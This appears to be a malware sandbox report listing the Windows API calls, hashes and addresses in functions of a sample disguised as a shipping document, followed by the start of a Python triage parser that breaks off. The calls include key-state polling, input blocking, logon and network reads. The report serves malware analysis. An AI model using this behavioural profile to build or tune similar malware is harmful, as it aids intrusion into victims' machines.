                                                                                                                      • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                      • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                      • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2609815416-0
                                                                                                                      • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                                      • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                      • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                                                                      • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                      • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcscat.LIBCMT ref: 004370BA
                                                                                                                      • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                      • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547909840-0
                                                                                                                      • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                      • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                      • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                      • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                      • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 2693929171-438819550
                                                                                                                      • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                      • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                      • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                      • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                      APIs
                                                                                                                      • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicollmouse_event
                                                                                                                      • String ID: DOWN
                                                                                                                      • API String ID: 1033544147-711622031
                                                                                                                      • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                      • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                      • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                      • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4170576061-0
• Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
• Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
• Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
• Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
• Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• IsWindowVisible.USER32 ref: 00477314
• IsWindowEnabled.USER32 ref: 00477324
• GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
• IsIconic.USER32 ref: 0047733F
• IsZoomed.USER32 ref: 0047734D
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
• Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
• Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
• Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
• Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: ACCEPT$^$h
• API String ID: 909875538-4263704089
• Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
• Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
• Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
• Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
• Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
• Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
• Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
• Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
• Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
• Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
• Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
• Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
• Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
• Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
APIs
• InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
• InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 901099227-0
                                                                                                                      • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                      • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                      • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                      • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
• Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID:
• String ID: 0vH$HH
• API String ID: 0-728391547
• Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
• Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
• Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
APIs
• DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
• Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
• Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
• Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
APIs
• BlockInput.USER32(00000001), ref: 0045A272
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
• Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
• Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
• Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
• Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
• Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
• Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
• Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
• Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
• Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
• Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
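The API bullets in the function blocks above (the WinINet reads at 004428C2/004428F9, FindFirstFileW at 0045DDA1, BlockInput(00000001) at 0045A272, LogonUserW at 0043918E and SetUnhandledExceptionFilter at 00422033) all share one line format: `• <Api>.<MODULE>(<args>), ref: <call site>`, with nested `Part of subcall function <addr>:` entries for callees. The following Python is an added triage helper written for this page; it is not part of the Joe Sandbox report or its IDA plugin. It parses those bullets into records and tags the call sites that correspond to behaviours already named in the report's signature list. The TRIAGE table wording is the editor's assumption rather than a Joe Sandbox classification, and the sample text is the bullets copied from the blocks above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One "APIs" bullet as rendered in the report's function blocks, e.g.
#   • BlockInput.USER32(00000001), ref: 0045A272
#   • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,...), ref: 00442880
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    api: str                   # exported name, e.g. BlockInput
    module: str                # DLL as printed by the report, e.g. USER32
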